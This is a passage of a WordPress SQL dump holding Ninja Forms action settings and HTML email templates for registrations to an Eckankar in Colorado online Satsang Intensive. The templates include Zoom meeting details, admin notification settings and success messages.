role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Satsang Intensive Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size:20px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 20px;\">ECK                                    Satsang Intensive - Online<br></span><span style=\"color: #23507d;font-size: 20px;\">10:30 AM to 11:30 AM MDT.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong> 893 0175 4811<br>                              <strong>Passcode: </strong>804641<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us06web.zoom.us/j/89301754811?pwd=WmNRREJxSE5UY3lNSWFuY1R4eXFRQT09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>','email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Satsang Intensive Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size:20px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 20px;\">ECK                                    Satsang Intensive - Online<br></span><span style=\"color: #23507d;font-size: 20px;\">10:30 AM to 11:30 AM MDT.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong> 893 0175 4811<br>                              <strong>Passcode: </strong>804641<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us06web.zoom.us/j/89301754811?pwd=WmNRREJxSE5UY3lNSWFuY1R4eXFRQT09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>');
INSERT INTO `wpcl_nf3_action_meta` VALUES (6468,217,'drawerDisabled','','drawerDisabled',''),(6469,217,'title','','title',''),(6470,217,'key','','key',''),(6471,217,'type','email','type','email'),(6472,217,'active','1','active','1'),(6473,217,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6474,217,'label','Admin Email Notification','label','Admin Email Notification'),(6475,217,'objectType','Action','objectType','Action'),(6476,217,'objectDomain','actions','objectDomain','actions'),(6477,217,'editActive','','editActive',''),(6478,217,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(6479,217,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(6480,217,'message','{all_fields_table}','message','{all_fields_table}'),(6481,217,'order','2','order','2'),(6482,217,'payment_gateways','','payment_gateways',''),(6483,217,'payment_total','0','payment_total','0'),(6484,217,'tag','','tag',''),(6485,217,'email_subject','New Event Registration from {field:firstname} {field:lastname}','email_subject','New Event Registration from {field:firstname} {field:lastname}'),(6486,217,'email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New                                Satsang Intensive Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new <b>Satsang Intensive</b> registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>','email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New                                Satsang Intensive Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new <b>Satsang Intensive</b> registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>'),(6487,217,'from_name','','from_name',''),(6488,217,'from_address','','from_address',''),(6489,217,'reply_to','{field:email}','reply_to','{field:email}'),(6490,217,'email_format','html','email_format','html'),(6491,217,'cc','','cc',''),(6492,217,'bcc','','bcc',''),(6493,217,'attach_csv','','attach_csv',''),(6494,217,'parent_id','44','parent_id','44'),(6495,217,'email_message_plain','','email_message_plain',''),(6496,218,'title','','title',''),(6497,218,'key','','key',''),(6498,218,'type','successmessage','type','successmessage'),(6499,218,'active','1','active','1'),(6500,218,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6501,218,'label','Success Message','label','Success Message'),(6502,218,'objectType','Action','objectType','Action'),(6503,218,'objectDomain','actions','objectDomain','actions'),(6504,218,'editActive','','editActive',''),(6505,218,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(6506,218,'order','1','order','1'),(6507,218,'payment_gateways','','payment_gateways',''),(6508,218,'payment_total','0','payment_total','0'),(6509,218,'tag','','tag',''),(6510,218,'to','{wp:admin_email}','to','{wp:admin_email}'),(6511,218,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6512,218,'email_message','{fields_table}','email_message','{fields_table}'),(6513,218,'from_name','','from_name',''),(6514,218,'from_address','','from_address',''),(6515,218,'reply_to','','reply_to',''),(6516,218,'email_format','html','email_format','html'),(6517,218,'cc','','cc',''),(6518,218,'bcc','','bcc',''),(6519,218,'attach_csv','','attach_csv',''),(6520,218,'redirect_url','','redirect_url',''),(6521,218,'success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email soon with Zoom Login information.</p>','success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email soon with Zoom Login information.</p>'),(6522,218,'parent_id','44','parent_id','44'),(6523,218,'email_message_plain','','email_message_plain',''),(6524,218,'submitter_email','','submitter_email',''),(6525,218,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6526,218,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6527,218,'set_subs_to_expire','0','set_subs_to_expire','0'),(6528,218,'subs_expire_time','90','subs_expire_time','90'),(6529,218,'drawerDisabled','','drawerDisabled',''),(6530,219,'title','','title',''),(6531,219,'key','','key',''),(6532,219,'type','save','type','save'),(6533,219,'active','1','active','1'),(6534,219,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6535,219,'label','Record Submission','label','Record Submission'),(6536,219,'objectType','Action','objectType','Action'),(6537,219,'objectDomain','actions','objectDomain','actions'),(6538,219,'editActive','','editActive',''),(6539,219,'order','3','order','3'),(6540,219,'payment_gateways','','payment_gateways',''),(6541,219,'payment_total','0','payment_total','0'),(6542,219,'tag','','tag',''),(6543,219,'to','{wp:admin_email}','to','{wp:admin_email}'),(6544,219,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6545,219,'email_message','{fields_table}','email_message','{fields_table}'),(6546,219,'from_name','','from_name',''),(6547,219,'from_address','','from_address',''),(6548,219,'reply_to','','reply_to',''),(6549,219,'email_format','html','email_format','html'),(6550,219,'cc','','cc',''),(6551,219,'bcc','','bcc',''),(6552,219,'attach_csv','','attach_csv',''),(6553,219,'redirect_url','','redirect_url',''),(6554,219,'parent_id','55','parent_id','55'),(6555,219,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6556,219,'email_message_plain','','email_message_plain',''),(6557,219,'submitter_email','','submitter_email',''),(6558,219,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6559,219,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6560,219,'set_subs_to_expire','0','set_subs_to_expire','0'),(6561,219,'subs_expire_time','90','subs_expire_time','90'),(6562,220,'title','','title',''),(6563,220,'key','','key',''),(6564,220,'type','email','type','email'),(6565,220,'active','1','active','1'),(6566,220,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6567,220,'label','User Email Confirmation','label','User Email Confirmation'),(6568,220,'objectType','Action','objectType','Action'),(6569,220,'objectDomain','actions','objectDomain','actions'),(6570,220,'editActive','','editActive',''),(6571,220,'to','{field:email}','to','{field:email}'),(6572,220,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(6573,220,'message','{all_fields_table}','message','{all_fields_table}'),(6574,220,'order','2','order','2'),(6575,220,'payment_gateways','','payment_gateways',''),(6576,220,'payment_total','0','payment_total','0'),(6577,220,'tag','','tag',''),(6578,220,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(6579,220,'email_message','<p>Your registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Your registration details are below:</p><p>{all_fields_table}<br></p>'),(6580,220,'from_name','','from_name',''),(6581,220,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(6582,220,'reply_to','','reply_to',''),(6583,220,'email_format','html','email_format','html'),(6584,220,'cc','','cc',''),(6585,220,'bcc','','bcc',''),(6586,220,'attach_csv','','attach_csv',''),(6587,220,'parent_id','55','parent_id','55'),(6588,220,'email_message_plain','','email_message_plain',''),(6589,221,'title','','title',''),(6590,221,'key','','key',''),(6591,221,'type','email','type','email'),(6592,221,'active','1','active','1'),(6593,221,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6594,221,'label','Admin Email Notification','label','Admin Email Notification'),(6595,221,'objectType','Action','objectType','Action'),(6596,221,'objectDomain','actions','objectDomain','actions'),(6597,221,'editActive','','editActive',''),(6598,221,'to','{system:admin_email}','to','{system:admin_email}'),(6599,221,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(6600,221,'message','{all_fields_table}','message','{all_fields_table}'),(6601,221,'order','2','order','2'),(6602,221,'payment_gateways','','payment_gateways',''),(6603,221,'payment_total','0','payment_total','0'),(6604,221,'tag','','tag',''),(6605,221,'email_subject','New Event Registration from {field:firstname} {field:lastname}','email_subject','New Event Registration from {field:firstname} {field:lastname}'),(6606,221,'email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>'),(6607,221,'from_name','','from_name',''),(6608,221,'from_address','','from_address',''),(6609,221,'reply_to','{field:email}','reply_to','{field:email}'),(6610,221,'email_format','html','email_format','html'),(6611,221,'cc','','cc',''),(6612,221,'bcc','','bcc',''),(6613,221,'attach_csv','','attach_csv',''),(6614,221,'parent_id','55','parent_id','55'),(6615,221,'email_message_plain','','email_message_plain',''),(6616,222,'title','','title',''),(6617,222,'key','','key',''),(6618,222,'type','successmessage','type','successmessage'),(6619,222,'active','1','active','1'),(6620,222,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(6621,222,'label','Success Message','label','Success Message'),(6622,222,'objectType','Action','objectType','Action'),(6623,222,'objectDomain','actions','objectDomain','actions'),(6624,222,'editActive','','editActive',''),(6625,222,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(6626,222,'order','1','order','1'),(6627,222,'payment_gateways','','payment_gateways',''),(6628,222,'payment_total','0','payment_total','0'),(6629,222,'tag','','tag',''),(6630,222,'to','{wp:admin_email}','to','{wp:admin_email}'),(6631,222,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6632,222,'email_message','{fields_table}','email_message','{fields_table}'),(6633,222,'from_name','','from_name',''),(6634,222,'from_address','','from_address',''),(6635,222,'reply_to','','reply_to',''),(6636,222,'email_format','html','email_format','html'),(6637,222,'cc','','cc',''),(6638,222,'bcc','','bcc',''),(6639,222,'attach_csv','','attach_csv',''),(6640,222,'redirect_url','','redirect_url',''),(6641,222,'success_msg','<p>Thank you for registering for our event.</p>','success_msg','<p>Thank you for registering for our event.</p>'),(6642,222,'parent_id','55','parent_id','55'),(6643,222,'email_message_plain','','email_message_plain',''),(6644,222,'submitter_email','','submitter_email',''),(6645,222,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6646,222,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6647,222,'set_subs_to_expire','0','set_subs_to_expire','0'),(6648,222,'subs_expire_time','90','subs_expire_time','90'),(6649,222,'drawerDisabled','','drawerDisabled',''),(6650,219,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(6651,223,'objectType','Action','objectType','Action'),(6652,223,'objectDomain','actions','objectDomain','actions'),(6653,223,'editActive','','editActive',''),(6654,223,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6655,223,'payment_gateways','','payment_gateways',''),(6656,223,'payment_total','0','payment_total','0'),(6657,223,'tag','','tag',''),(6658,223,'to','{wp:admin_email}','to','{wp:admin_email}'),(6659,223,'reply_to','','reply_to',''),(6660,223,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(6661,223,'email_message','{fields_table}','email_message','{fields_table}'),(6662,223,'email_message_plain','','email_message_plain',''),(6663,223,'from_name','','from_name',''),(6664,223,'from_address','','from_address',''),(6665,223,'email_format','html','email_format','html'),(6666,223,'cc','','cc',''),(6667,223,'bcc','','bcc',''),(6668,223,'redirect_url','','redirect_url',''),(6669,223,'submitter_email','','submitter_email',''),(6670,223,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(6671,223,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(6672,223,'set_subs_to_expire','0','set_subs_to_expire','0'),(6673,223,'subs_expire_time','90','subs_expire_time','90'),(6674,223,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(6675,223,'title','','title',''),(6676,223,'key','','key',''),(6677,223,'type','save','type','save'),(6678,223,'active','1','active','1'),(6679,223,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(6680,223,'label','Save Form','label','Save Form'),(6681,223,'parent_id','13','parent_id','13'),(6682,224,'objectType','Action','objectType','Action'),(6683,224,'objectDomain','actions','objectDomain','actions'),(6684,224,'editActive','','editActive',''),(6685,224,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(6686,224,'payment_gateways','','payment_gateways',''),(6687,224,'payment_total','0','payment_total','0'),(6688,224,'tag','','tag',''),(6689,224,'email_message_plain','','email_message_plain',''),(6690,224,'title','','title',''),(6691,224,'key','','key',''),(6692,224,'type','email','type','email'),(6693,224,'active','0','active','0'),(6694,224,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(6695,224,'date_updated','2016-01-15','date_updated','2016-01-15'),(6696,224,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(6697,224,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(6698,224,'to','{field:email_270}','to','{field:email_270}'),(6699,224,'email_subject','Western Slope Leadership Communication','email_subject','Western Slope Leadership Communication'),(6700,224,'email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    